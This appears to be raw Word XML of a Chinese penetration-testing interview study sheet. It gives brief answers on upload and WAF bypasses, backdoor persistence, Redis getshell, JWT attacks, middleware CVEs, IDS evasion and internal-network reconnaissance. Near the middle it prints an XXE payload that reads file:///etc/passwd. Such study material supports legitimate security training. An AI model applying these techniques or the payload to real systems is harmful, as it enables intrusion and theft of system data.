      <w:r>
        <w:t>添加Token字段并验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>添加自定义字段并验证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文件上传绕过方法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WAF绕过：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>修改上传表单字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>表单字段大小写替换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>表单字段增加或减少空格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>表单字段字符串拼接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>构造双文件上传表单，同时上传双文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>垃圾数据填充绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件名大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务器检测绕过：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>MIME类型绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>前端JS检测抓包改包绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>黑名单绕过：php3、asa、ashx、windows特性（test.asp_、流特性）、apache解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>图片内容检测使用图片马绕过 .htassess绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>白名单检测绕过：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>截断上传绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IIS6/7/7.5解析漏洞，nginx低版本解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件包含绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码相关利用点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码复用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码可识别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码失效</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码DDOS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cookie你会测试什么内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sql注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>权限绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>敏感信息泄露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说出几个业务逻辑漏洞类型？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>任意用户密码重置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>短信轰炸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>订单金额修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>忘记密码绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>恶意刷票</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码复用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简述文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>调用文件包含函数时，未严格限制文件名和路径，如include()、require()等函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>业务逻辑漏洞，用户任意密码重置有什么例子，因为什么因素导致的？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>普通用户重置管理用户密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>普通用户重置普通用户密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>未设置用户唯一Token，导致越权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渗透测试过程中发现一个只能上传zip文件的功能，有什么可能的思路？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>shell压缩上传，程序自解压getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>尝试解析漏洞getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>寻找文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>木马钓鱼管理员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为什么aspx木马权限比asp大？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>aspx使用的是.net技术,IIS中默认不支持，ASPX需要依赖于.net framework，ASP只是脚本语言 入侵的时候asp的木马一般是guest权限APSX的木马一般是users权限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只有一个登录页面有哪些思路？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL注入、万能密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>权限绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>敏感信息泄露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请求头中哪些是有危害的？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>COOKIE注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>user-agent注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>X-Forwarded-For注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Referer注入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谈谈水平/垂直/未授权越权访问的区别?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>水平越权：普通用户越权访问普通用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>垂直越权：普通用户越权访问管理用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>未授权访问：权限控制不严，导致无需登录访问已登录用户页面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xss有什么？执行存储型的xss的危害和原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>存储型、反射型、DOM型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>存储型XSS是指应用程序通过Web请求获取不可信赖的数据，在未检验数据是否存在XSS代码的情况下，便将其存入数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>存储型XSS危害：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>窃取用户Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XSS钓鱼攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XSS蠕虫攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>获取键盘记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>获取用户信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>获取屏幕截图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主机疑似遭到入侵，要看哪里的日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>系统登录日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务访问日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>网站日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>数据库日志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python常用的标准库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>正则表达式 re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>时间模块 time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>随机数 random</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>操作系统接口 os</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>科学计算 math</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>网络请求 urlib</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>http库 requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>爬虫库 Scrapy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>多线程库 threading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>reverse_tcp 和 bind_tcp 的区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>reverse_tcp：攻击机设置一个端口和IP，Payload在测试机执行连接攻击机IP的端口，这时如果在攻击机监听该端口会发现测试机已经连接 白话就是让受控机主动连接我们</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>bind_tcp：攻击机设置一个端口（LPORT），Payload在测试机执行打开该端口，以便攻击机可以接入 白话就是我们主动连接受控机 使用reverse_tcp较为安全，一般不会被防火墙发现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oauth认证过程中可能会出现什么问题，导致什么样的漏洞?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>redirect_uri校验不严格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>错误的参数传递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做了cdn的网站如何获取真实IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>全球ping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>查询历史解析记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>探针文件如phpinfo等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用命令执行连接我们的服务器或DNSlog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>寻找网站配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过二级域名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>全网扫描，title匹配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jsonp跨域与CORS跨域的区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>jsonp浏览器支持较好，CORS不支持IE9及以下浏览器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>jsonp只支持GET，CORS支持所有类型的HTTP请求 jsonp只发一次请求，复杂请求CORS发送两次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算法？了解过什么排序？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>冒泡排序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>选择排序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>插入排序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SSRF漏洞利用？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本地文件读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务探测、端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击内网redis、mysql、fastcgi等服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用到的协议有：http/s、file、gopher、tftp、dict、ssh、telnet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常见后门方式？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>注册表自启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>shift后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>远控软件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>添加管理用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>影子用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>定时任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>dll劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注册表劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>MBR后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WMI后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>管理员密码记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Linux:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>SSH后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SUID后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Crontab计划任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PAM后门</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>添加管理员账号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Rootkit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open_basedir访问目录限制绕过方法？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用命令执行函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用symlink()函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>glob伪协议绕过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PHP代码审计中容易出问题的点？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>参数拼接方式皆有可能产生SQL注入（老生常谈）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>全局变量注册导致的变量覆盖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fwrite参数未过滤导致的代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>权限校验疏漏导致的后台功能访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>接口任意文件上传</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>unserialize反序列化漏洞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红蓝对抗中蓝队反杀红队场景和姿势？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>钓鱼、蜜罐、蚁剑RCE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linux计划任务，黑客隐藏自己的计划任务会怎么做？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>临时任务：at、batch命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Redis未授权常见getshell的几种方式？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>web绝对路径写shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>写入ssh公钥获取服务器权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>主从复制getshell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JWT的攻击手法？（头部、负载、签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>加密算法置为空绕过身份验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>爆破弱密钥 kid参数：任意文件读取、SQL注入、命令注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>未校验签名，内容重新编码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JAVA中间件的漏洞，举几个例子？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JBoss反序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WebLogic反序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tomcat任意文件写入、弱口令+后台getshell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DNS外带可以用在哪些漏洞？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>无回显的命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XXE盲打</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SSRF盲打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HTTP-Only禁止的是JS读取cookie信息，如何绕过这个获取cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>劫持登录页面钓鱼绕过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中间件漏洞总结？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>这里只写常利用的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IIS:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>IIS6.0 PUT漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IIS6.0 远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IIS6.0 解析漏洞 IIS启用.net 短文件名漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IIS7.0/7.5 解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Apache:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>未知扩展名解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>配合错误导致的解析漏洞、目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nginx：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>配置错误导致的解析漏洞、目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>配置错误导致的任意代码执行、任意文件写入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>弱口令+管理后台war包部署getshell manager/html</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>管理后台弱口令爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JBoss:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>5.x/6.x反序列化漏洞（CVE-2017-12149）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JMXInvokerServlet反序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>EJBInvokerServlet反序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JMX Console未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>弱口令+管理后台war包部署getshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WebLogic:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>XMLDecoder 反序列化漏洞（CVE-2017-10271 &amp; CVE-2017-3506）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>wls9_async_response,wls-wsat 反序列化远程代码执行漏洞（CVE-2019-2725）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>弱口令+管理后台war包部署getshell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谈一谈Windows系统与Linux系统提权的思路？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>数据库提权：mysql、sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第三方软件提权：serv-u DLL劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>系统内核溢出漏洞提权：cve系列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Linux：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>sudo提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>suid提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>redis 内核提权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python有哪些框架，其中出现过哪些漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Django、Flask、Scrapy Django任意代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Flask模板注入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小程序的渗透和普通渗透的差异</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>渗透过程不变，依旧是抓包修改参数渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>不同点是小程序会将包下载到本地，可以使用逆向还原工具反编译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app本身的漏洞测试 四大组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Activity组件:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>activity绑定browserable与自定义协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ActivityManager漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Service组件:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>权限提升，拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Broadcast Receiver组件:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>权限管理不当</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>BroadcastReceiver导出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>动态注册广播组件暴露漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Content Provider组件:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>读写权限漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Content Provider中的SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Provider文件目录遍历漏洞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IDS/IPS防护原理及绕过思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>IDS工作在网络层，旁路部署，通过抓取和分析网络流量来发现攻击 IPS一般也是在网络层旁路，可以理解为具备阻断能力的IDS，是IDS的升级版（也有IDS检测到攻击通知阻断设备执行阻断动作的设备联动模式），可以覆盖网络层和应用层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>绕过：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>TCP分片：拆分出两个TCP包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IP分片：原理同TCP分片，但是丢包严重</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>程序bug/性能问题：发送大量无效包，消耗IPS性能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>伪造TCP状态：绕过基于状态追踪的IPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IPV6绕过：使用IPV6地址绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>json的csrf的利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用XMLHttpRequest、fetch构造出JSON请求，利用Flash的跨域与307跳转来绕过http自定义头限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>json格式的数据包可以测哪些漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>csrf json劫持 xss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简述xxe漏洞原理与利用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>XML外部实体注入，在应用程序解析XML输入时，当允许引用外部实体时，可构造恶意内容，产生漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>DTD Document Type Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DTD 内部声明  &lt;!DOCTYPE 根元素 [元素声明]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DTD 外部引用  &lt;!DOCTYPE 根元素名称 SYSTEM “外部DTD的URI”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>引用公共DTD &lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ENTITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="utf-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;!DOCTYPE root [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">    &lt;!ENTITY x "First Param!"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">    &lt;!ENTITY y "Second Param!"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">    &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;root&gt;&lt;x&gt;&amp;x;&lt;/x&gt;&lt;y&gt;&amp;y;&lt;/y&gt;&lt;xxe&gt;&amp;xxe;&lt;/xxe&gt;&lt;/root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>图片来自网络</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>￼</w:t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内网服务器，如何进行信息收集？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用脚本收集：端口信息、服务信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>系统命令收集：域内用户可使用域命令收集域信息， net group "domain users" /domain等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>端口扫描工具全段扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本机信息收集：管理密码、登录日志看管理员ip、服务密码收集、网段信息查看、历史记录查看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>内网DNS域传送漏洞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如果拿下了内网边界层的某一个机器，如何对内网其他进行探测？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>首先使用代理进入内网reg、ew等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第二在本机进行信息收集，包括管理员ip、端口服务、账号密码、路由信息、网段信息等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第三扩展到收集到的网段进行渗透，利用常用服务:SMB、MYSQL、SQLserver、ftp、telnet等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>借助轻量化脚本或扫描器扫描，但一般不这么做，动静太大容易被管理员发现</w:t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Mysql数据库常用命令：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Docker命令：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6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6"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>systemctl start docker     启动docker images     查看有哪些镜像docker run -it ubuntu /bin/bash   进入docker容器镜像docker rmi -f ba6acccedd29（id）     删除镜像docker search centos      搜索仓库里面的镜像docker pull centos     根据搜索到的镜像名字安装docker ps -a        查看容器docker start 952      启动容器docker ps       查看容器docker exec -it 95 /bin/bash       进入容器   docker run -d -P --name=mhy1 c15726116aefdocker cp /root/uploads.zip a709fdbbaff5:/app    传文件           docker.io/vulfocus/log4j2-rce-2021-12-09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Linux命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16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6"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
